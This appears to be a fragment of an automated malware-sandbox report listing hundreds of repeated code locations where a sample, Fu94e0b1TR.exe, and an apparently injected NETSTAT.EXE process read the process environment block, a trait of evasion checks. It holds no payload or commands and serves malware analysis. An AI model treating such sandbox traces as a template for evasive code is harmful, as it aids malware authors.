            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0120A537 mov eax, dword ptr fs:[00000030h] 6_2_0120A537
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01189100 mov eax, dword ptr fs:[00000030h] 6_2_01189100
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B4D3B mov eax, dword ptr fs:[00000030h] 6_2_011B4D3B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B513A mov eax, dword ptr fs:[00000030h] 6_2_011B513A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0118AD30 mov eax, dword ptr fs:[00000030h] 6_2_0118AD30
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h] 6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011A4120 mov eax, dword ptr fs:[00000030h] 6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011A4120 mov ecx, dword ptr fs:[00000030h] 6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011A7D50 mov eax, dword ptr fs:[00000030h] 6_2_011A7D50
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011AB944 mov eax, dword ptr fs:[00000030h] 6_2_011AB944
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C3D43 mov eax, dword ptr fs:[00000030h] 6_2_011C3D43
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01203540 mov eax, dword ptr fs:[00000030h] 6_2_01203540
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0118B171 mov eax, dword ptr fs:[00000030h] 6_2_0118B171
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011AC577 mov eax, dword ptr fs:[00000030h] 6_2_011AC577
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0118C962 mov eax, dword ptr fs:[00000030h] 6_2_0118C962
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011BFD9B mov eax, dword ptr fs:[00000030h] 6_2_011BFD9B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_012069A6 mov eax, dword ptr fs:[00000030h] 6_2_012069A6
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B2990 mov eax, dword ptr fs:[00000030h] 6_2_011B2990
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01182D8A mov eax, dword ptr fs:[00000030h] 6_2_01182D8A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011AC182 mov eax, dword ptr fs:[00000030h] 6_2_011AC182
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B2581 mov eax, dword ptr fs:[00000030h] 6_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011BA185 mov eax, dword ptr fs:[00000030h] 6_2_011BA185
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_012051BE mov eax, dword ptr fs:[00000030h] 6_2_012051BE
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B1DB5 mov eax, dword ptr fs:[00000030h] 6_2_011B1DB5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B35A1 mov eax, dword ptr fs:[00000030h] 6_2_011B35A1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B61A0 mov eax, dword ptr fs:[00000030h] 6_2_011B61A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_012141E8 mov eax, dword ptr fs:[00000030h] 6_2_012141E8
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01238DF1 mov eax, dword ptr fs:[00000030h] 6_2_01238DF1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01206DC9 mov eax, dword ptr fs:[00000030h] 6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01206DC9 mov ecx, dword ptr fs:[00000030h] 6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0118B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0118B1E1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0119D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0119D5E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h] 6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0125740D mov eax, dword ptr fs:[00000030h] 6_2_0125740D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01206C0A mov eax, dword ptr fs:[00000030h] 6_2_01206C0A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01254015 mov eax, dword ptr fs:[00000030h] 6_2_01254015
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0119B02A mov eax, dword ptr fs:[00000030h] 6_2_0119B02A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01207016 mov eax, dword ptr fs:[00000030h] 6_2_01207016
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B002D mov eax, dword ptr fs:[00000030h] 6_2_011B002D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011BBC2C mov eax, dword ptr fs:[00000030h] 6_2_011BBC2C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011A0050 mov eax, dword ptr fs:[00000030h] 6_2_011A0050
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011BA44B mov eax, dword ptr fs:[00000030h] 6_2_011BA44B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01251074 mov eax, dword ptr fs:[00000030h] 6_2_01251074
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01242073 mov eax, dword ptr fs:[00000030h] 6_2_01242073
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0121C450 mov eax, dword ptr fs:[00000030h] 6_2_0121C450
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011A746D mov eax, dword ptr fs:[00000030h] 6_2_011A746D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0119849B mov eax, dword ptr fs:[00000030h] 6_2_0119849B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01189080 mov eax, dword ptr fs:[00000030h] 6_2_01189080
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011BF0BF mov ecx, dword ptr fs:[00000030h] 6_2_011BF0BF
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011BF0BF mov eax, dword ptr fs:[00000030h] 6_2_011BF0BF
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01203884 mov eax, dword ptr fs:[00000030h] 6_2_01203884
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C90AF mov eax, dword ptr fs:[00000030h] 6_2_011C90AF
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206CF0 mov eax, dword ptr fs:[00000030h]6_2_01206CF0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206CF0 mov eax, dword ptr fs:[00000030h]6_2_01206CF0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206CF0 mov eax, dword ptr fs:[00000030h]6_2_01206CF0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012414FB mov eax, dword ptr fs:[00000030h]6_2_012414FB
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov ecx, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258CD6 mov eax, dword ptr fs:[00000030h]6_2_01258CD6
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011858EC mov eax, dword ptr fs:[00000030h]6_2_011858EC
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AF716 mov eax, dword ptr fs:[00000030h]6_2_011AF716
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA70E mov eax, dword ptr fs:[00000030h]6_2_011BA70E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA70E mov eax, dword ptr fs:[00000030h]6_2_011BA70E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0125070D mov eax, dword ptr fs:[00000030h]6_2_0125070D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0125070D mov eax, dword ptr fs:[00000030h]6_2_0125070D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BE730 mov eax, dword ptr fs:[00000030h]6_2_011BE730
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121FF10 mov eax, dword ptr fs:[00000030h]6_2_0121FF10
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121FF10 mov eax, dword ptr fs:[00000030h]6_2_0121FF10
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01184F2E mov eax, dword ptr fs:[00000030h]6_2_01184F2E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01184F2E mov eax, dword ptr fs:[00000030h]6_2_01184F2E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0124131B mov eax, dword ptr fs:[00000030h]6_2_0124131B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118F358 mov eax, dword ptr fs:[00000030h]6_2_0118F358
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258F6A mov eax, dword ptr fs:[00000030h]6_2_01258F6A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118DB40 mov eax, dword ptr fs:[00000030h]6_2_0118DB40
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119EF40 mov eax, dword ptr fs:[00000030h]6_2_0119EF40
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B3B7A mov eax, dword ptr fs:[00000030h]6_2_011B3B7A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B3B7A mov eax, dword ptr fs:[00000030h]6_2_011B3B7A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118DB60 mov ecx, dword ptr fs:[00000030h]6_2_0118DB60
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119FF60 mov eax, dword ptr fs:[00000030h]6_2_0119FF60
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258B58 mov eax, dword ptr fs:[00000030h]6_2_01258B58
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01255BA5 mov eax, dword ptr fs:[00000030h]6_2_01255BA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BB390 mov eax, dword ptr fs:[00000030h]6_2_011BB390
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2397 mov eax, dword ptr fs:[00000030h]6_2_011B2397
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01198794 mov eax, dword ptr fs:[00000030h]6_2_01198794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01191B8F mov eax, dword ptr fs:[00000030h]6_2_01191B8F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01191B8F mov eax, dword ptr fs:[00000030h]6_2_01191B8F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123D380 mov ecx, dword ptr fs:[00000030h]6_2_0123D380
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0124138A mov eax, dword ptr fs:[00000030h]6_2_0124138A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207794 mov eax, dword ptr fs:[00000030h]6_2_01207794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207794 mov eax, dword ptr fs:[00000030h]6_2_01207794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207794 mov eax, dword ptr fs:[00000030h]6_2_01207794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4BAD mov eax, dword ptr fs:[00000030h]6_2_011B4BAD
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4BAD mov eax, dword ptr fs:[00000030h]6_2_011B4BAD
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4BAD mov eax, dword ptr fs:[00000030h]6_2_011B4BAD
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C37F5 mov eax, dword ptr fs:[00000030h]6_2_011C37F5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012053CA mov eax, dword ptr fs:[00000030h]6_2_012053CA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012053CA mov eax, dword ptr fs:[00000030h]6_2_012053CA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A3A1C mov eax, dword ptr fs:[00000030h]6_2_011A3A1C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA61C mov eax, dword ptr fs:[00000030h]6_2_011BA61C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA61C mov eax, dword ptr fs:[00000030h]6_2_011BA61C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov eax, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov ecx, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov eax, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov eax, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118AA16 mov eax, dword ptr fs:[00000030h]6_2_0118AA16
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118AA16 mov eax, dword ptr fs:[00000030h]6_2_0118AA16
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01198A0A mov eax, dword ptr fs:[00000030h]6_2_01198A0A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118C600 mov eax, dword ptr fs:[00000030h]6_2_0118C600
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118C600 mov eax, dword ptr fs:[00000030h]6_2_0118C600
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118C600 mov eax, dword ptr fs:[00000030h]6_2_0118C600
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B8E00 mov eax, dword ptr fs:[00000030h]6_2_011B8E00
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123FE3F mov eax, dword ptr fs:[00000030h]6_2_0123FE3F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C4A2C mov eax, dword ptr fs:[00000030h]6_2_011C4A2C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C4A2C mov eax, dword ptr fs:[00000030h]6_2_011C4A2C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118E620 mov eax, dword ptr fs:[00000030h]6_2_0118E620
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123B260 mov eax, dword ptr fs:[00000030h]6_2_0123B260
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123B260 mov eax, dword ptr fs:[00000030h]6_2_0123B260
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258A62 mov eax, dword ptr fs:[00000030h]6_2_01258A62
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C927A mov eax, dword ptr fs:[00000030h]6_2_011C927A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119766D mov eax, dword ptr fs:[00000030h]6_2_0119766D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01214257 mov eax, dword ptr fs:[00000030h]6_2_01214257
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01250EA5 mov eax, dword ptr fs:[00000030h]6_2_01250EA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01250EA5 mov eax, dword ptr fs:[00000030h]6_2_01250EA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01250EA5 mov eax, dword ptr fs:[00000030h]6_2_01250EA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012046A7 mov eax, dword ptr fs:[00000030h]6_2_012046A7
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BD294 mov eax, dword ptr fs:[00000030h]6_2_011BD294
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BD294 mov eax, dword ptr fs:[00000030h]6_2_011BD294
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121FE87 mov eax, dword ptr fs:[00000030h]6_2_0121FE87
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119AAB0 mov eax, dword ptr fs:[00000030h]6_2_0119AAB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119AAB0 mov eax, dword ptr fs:[00000030h]6_2_0119AAB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BFAB0 mov eax, dword ptr fs:[00000030h]6_2_011BFAB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2ACB mov eax, dword ptr fs:[00000030h]6_2_011B2ACB
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B36CC mov eax, dword ptr fs:[00000030h]6_2_011B36CC
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C8EC7 mov eax, dword ptr fs:[00000030h]6_2_011C8EC7
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123FEC0 mov eax, dword ptr fs:[00000030h]6_2_0123FEC0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258ED6 mov eax, dword ptr fs:[00000030h]6_2_01258ED6
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B16E0 mov ecx, dword ptr fs:[00000030h]6_2_011B16E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011976E2 mov eax, dword ptr fs:[00000030h]6_2_011976E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2AE4 mov eax, dword ptr fs:[00000030h]6_2_011B2AE4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D736CC mov eax, dword ptr fs:[00000030h]18_2_02D736CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFFEC0 mov eax, dword ptr fs:[00000030h]18_2_02DFFEC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D88EC7 mov eax, dword ptr fs:[00000030h]18_2_02D88EC7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D716E0 mov ecx, dword ptr fs:[00000030h]18_2_02D716E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18ED6 mov eax, dword ptr fs:[00000030h]18_2_02E18ED6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D576E2 mov eax, dword ptr fs:[00000030h]18_2_02D576E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7D294 mov eax, dword ptr fs:[00000030h]18_2_02D7D294
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7D294 mov eax, dword ptr fs:[00000030h]18_2_02D7D294
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E10EA5 mov eax, dword ptr fs:[00000030h]18_2_02E10EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E10EA5 mov eax, dword ptr fs:[00000030h]18_2_02E10EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E10EA5 mov eax, dword ptr fs:[00000030h]18_2_02E10EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDFE87 mov eax, dword ptr fs:[00000030h]18_2_02DDFE87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5AAB0 mov eax, dword ptr fs:[00000030h]18_2_02D5AAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5AAB0 mov eax, dword ptr fs:[00000030h]18_2_02D5AAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7FAB0 mov eax, dword ptr fs:[00000030h]18_2_02D7FAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC46A7 mov eax, dword ptr fs:[00000030h]18_2_02DC46A7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18A62 mov eax, dword ptr fs:[00000030h]18_2_02E18A62
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DD4257 mov eax, dword ptr fs:[00000030h]18_2_02DD4257
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
